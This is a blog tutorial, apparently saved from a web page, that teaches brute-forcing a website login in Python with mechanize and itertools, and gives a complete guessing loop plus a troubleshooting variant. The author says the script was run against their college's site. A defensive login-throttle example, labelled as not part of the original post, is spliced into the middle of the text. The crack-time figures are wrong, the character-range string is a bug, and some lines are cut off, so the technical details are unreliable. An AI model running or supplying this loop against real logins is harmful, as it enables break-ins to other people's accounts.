
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

Coder In Aero

Learn More. Write More. Become More.

Posted by: Teja R D
Posted on: December 8, 2014
Posted under: Hacking, Python

Brute Force A Website Login In Python

(https://coderinaero.files.wordpress.com/2014/12/main.jpg)
Screenshot of the Python script running a brute-force attack on my college’s website.

This post gives a brief introduction to brute-force attacks and to Mechanize, a Python library
for web browsing, and explains a sample Python script to brute force a website login.

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 1/10

Brute Force Attack

Brute force is the simplest way to recover a lost password (yet it can take literally ages
to crack one). It involves checking every possible combination of characters until the
right one is found. It is most useful when the characters in the password are known but
their order is not, because the number of possible combinations then decreases
drastically. The following paragraph gives a rough idea of how long it can take to find
the right combination in the worst case.

Suppose the length of the password is N and we know nothing about the characters in it.
The possible characters are all letters (upper and lowercase), digits (0-9) and special
characters (~, @, #, $, ^), so each character of the password can be any of these 67
characters, which leads to a total of 67^N combinations (as you can clearly see, this
increases exponentially with the length). If we are brute forcing a website login, the time
taken depends significantly on the internet speed; for instance, if it can do four login
checks per second, it takes nearly 58 hours to crack a password of four characters. If we
know the characters, we can find the correct combination in 64 seconds, far less than in
the previous case.

Mechanize

In the following brute-force script we use Mechanize
(http://wwwsearch.sourceforge.net/mechanize/), a Python library for stateful
programmatic web browsing, used for automating interaction with websites (initially it
was written for Perl (http://search.cpan.org/~ether/WWW-Mechanize-1.73/lib/WWW/Mechanize.pm)
users). There are many ways to install this library. The following two ways will
automatically download the latest version of the source and install it (for Linux users).

Easy Install:

easy_install mechanize

Pip:

pip install mechanize


To install it manually, you can go through their documentation at Mechanize
(http://wwwsearch.sourceforge.net/mechanize/). Here are a few things you have to know
about mechanize in order to understand the sample script.

1. Initializing browser object:

import mechanize
br = mechanize.Browser()

2. Opening the login page:

response = br.open(url)

3. Selecting the required form in the page:

br.select_form("form name") #selecting forms by name
br.select_form(nr=0) #use to select the first form in the page i

4. Filling the form: Assign values to the form fields

br.form['userName'] = 'user name'
br.form['password'] = 'password'

5. Submitting form:

br.method = "POST"
response = br.submit()
print response.geturl() #url to which the page has redirected after log

To learn more about mechanize:
Cheat sheet (http://dreamrunner.org/wiki/public_html/Python/Python%20Mechanize%20Cheat%20Sheet%20.html) |
Missing manual (http://qxf2.com/blog/python-mechanize-the-missing-manual/) |
Browsing in python (http://www.pythonforbeginners.com/mechanize/browsing-in-python-with-mechanize)


Sample Python script

1. Import required modules

We will use Python’s core module ‘itertools’ for generating possible password
combinations.

#!/usr/bin/python
import mechanize
import itertools

2. Initializing browser object

Initialize using mechanize.Browser( )

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False) #no robots

3. Generating combinations

If you know characters in the password. (Go through itertools docs for more info.)

combinations = itertools.permutations("i34^UhP#",8)
#takes characters and length of string to generate as arguments(no repe

Otherwise (I would not recommend this for obvious reasons)

combinations = itertools.permutations("a-zA-Z0-9!@#$%^",n)

4. Establishing connection and checking the possibilities

Here is the final python code.



#!/usr/bin/python
import mechanize
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("i3^4hUP-",8)
br.open("http://www.example.com/login/")
for x in combos:
    br.select_form( nr = 0 )
    br.form['userName'] = "user name"
    br.form['password'] = ''.join(x)
    print "Checking ",br.form['password']
    response=br.submit()
    if response.geturl()=="http://www.example.com/redirected_to_url":
        #url to which the page is redirected after login
        print "Correct password is ",''.join(x)
        break
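
From the server's side, the loop above is a steady stream of failed logins against one account. The following is an added example, not part of the original post: a per-account throttle with a sliding window and doubling lockout, plus a replay of the four-checks-per-second rate used earlier to show how few guesses still reach the password check. The class name, the thresholds and the `simulate` helper are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

WINDOW_S = 60      # sliding window length in seconds (assumed policy value)
MAX_FAILS = 5      # failures tolerated per account inside the window (assumed)
BASE_LOCK_S = 30   # first lockout; doubles on every further trip (assumed)


class LoginThrottle:
    """Per-account failed-login tracker: sliding window plus doubling lockout."""

    def __init__(self):
        self.fails = defaultdict(deque)  # account -> timestamps of recent failures
        self.trips = defaultdict(int)    # account -> lockouts triggered so far
        self.locked_until = {}           # account -> time at which the lockout ends

    def allowed(self, account, now):
        return now >= self.locked_until.get(account, 0.0)

    def record_failure(self, account, now):
        """Register a failed login; return the lockout (seconds) it triggered, or 0."""
        q = self.fails[account]
        q.append(now)
        while q and now - q[0] > WINDOW_S:   # drop failures older than the window
            q.popleft()
        if len(q) < MAX_FAILS:
            return 0
        lock = BASE_LOCK_S * 2 ** self.trips[account]
        self.trips[account] += 1
        self.locked_until[account] = now + lock
        q.clear()
        return lock

    def record_success(self, account):
        # A good login resets the account's failure history and lockout level.
        self.fails.pop(account, None)
        self.trips.pop(account, None)
        self.locked_until.pop(account, None)


def simulate(rate_per_s, duration_s, account="user name"):
    """Replay a constant-rate stream of wrong passwords (constructed input);
    return how many attempts actually reached the password check."""
    throttle, checked = LoginThrottle(), 0
    for i in range(int(rate_per_s * duration_s)):
        now = i / rate_per_s
        if not throttle.allowed(account, now):
            continue                     # rejected before any password comparison
        checked += 1
        throttle.record_failure(account, now)
    return checked
```

With these values, `simulate(4, 3600)` lets 35 of 14400 attempts through in an hour. Per-account lockout can also be triggered on purpose to lock a legitimate user out, so it is usually paired with per-source limits or a challenge step.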

Troubleshooting errors

mechanize._mechanize.FormNotFoundError: no form matching nr 0

Most of the time I ended up getting this error even though there is a form element in the
page. I thought this might be due to bad HTML in the page. Anyway, you can solve this
error by changing the form element in the browser object (copy the form element from the
page’s HTML). Here is the new code snippet:

#!/usr/bin/python
import mechanize
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos=itertools.permutations("i34U^hP-",8)
r =br.open("https://www.example.com/login/")
for x in combos:
    new_form = '''
<form method="post" action="index.php">
<b>Enter the username :</b><input type="text" name="rollno" size="16" maxleng
<b>Enter the password:</b><input type="password" name="pwd" size="16">
<input type="submit" name="submit" value="Submit">
</form>
'''
    #all you have to take care is they have the same name for input fields and submi
    r.set_data(new_form)
    br.set_response(r)
    br.select_form( nr = 0 )
    br.form['userName'] = "user name"
    br.form['password'] = ''.join(x)
    print "Checking ",br.form['password']
    response=br.submit()
    if response.geturl()=="http://www.example.com/redirected_to_url":
        #url to which the page is redirected after login
        print "Correct password is ",''.join(x)
        break
